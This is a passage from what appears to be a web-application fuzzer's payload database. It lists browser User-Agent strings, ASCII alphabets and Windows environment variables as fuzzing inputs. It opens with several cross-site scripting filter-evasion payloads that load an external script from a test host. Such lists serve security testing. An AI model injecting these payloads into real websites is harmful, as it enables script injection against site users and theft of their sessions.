<SCRIPT ="blah" SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://testsite.com/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://testsite.com/xss.js"></SCRIPT>
P:044-USR-AGN:All User Agents:29
> HTTP | Replacive Fuzzers | User Agents | Headers
>> Impersonate different browsers and operating systems by modifying the User-Agent header field
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT)
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)
User-Agent: Mozilla/4.79 [en] (WinNT; U)
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14
User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5G77 Safari/525.20
User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
User-Agent: Opera/9.27 (Windows NT 5.1; U; en)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.25 Safari/525.19
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19
User-Agent: Wget/1.8.2
User-Agent: Mozilla/5.0 (PLAYSTATION 3; 1.00)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/1.4
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.centos4 Firefox/1.0.7
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20070606
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5
R:045-A85-RFC:ASCII 85 Alphabet:85
> Alphabets | Number Systems | Base | Recursive Fuzzers
>> RFC 1924: Published on April 1, 1996, presumably not meant to be taken too seriously
0
1
2
3
4
5
6
7
8
9
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
!
#
$
%
&
(
)
*
+
-
;
<
=
>
?
@
^
_
`
{
|
}
~
.
R:046-A94-CHR:ASCII 94 Alphabet:94
> Alphabets | Number Systems | Base | Recursive Fuzzers
>> The 94 (95 minus one, the space) printable ASCII characters, numbered from 33 to 126 (decimal)
!
"
#
$
%
&
'
(
)
*
+
,
-
.
/
0
1
2
3
4
5
6
7
8
9
:
;
<
=
>
?
@
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
[
\
]
^
_
`
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
{
|
}
~
R:047-A95-CHR:ASCII 95 Alphabet:95
> Alphabets | Number Systems | Base | Recursive Fuzzers
>> The 95 printable ASCII characters, numbered from 32 to 126 (decimal)
!
"
#
$
%
&
'
(
)
*
+
,
-
.
/
0
1
2
3
4
5
6
7
8
9
:
;
<
=
>
?
@
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
[
\
]
^
_
`
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
{
|
}
~
P:048-WIN-VAR:Windows Environment Variables:26
> O/S Variables | Replacive Fuzzers
>> Windows XP, Vista and 7: special variable aliases or placeholders for basic system properties
%ALLUSERSPROFILE%
%APPDATA%
%COMPUTERNAME%
%COMSPEC%
%HOMEDRIVE%
%HOMEPATH%
%PATH%
%PATHEXT%
%PROGRAMFILES%
%PROMPT%
%SYSTEMDRIVE%
%SYSTEMROOT%
%TEMP%
%TMP%
%USERNAME%
%USERPROFILE%
%WINDIR%
%DATE%
%TIME%
%CD%
%ERRORLEVEL%
%RANDOM%
%CommonProgramFiles%
%LOCALAPPDATA%
%ProgramData%
%Public%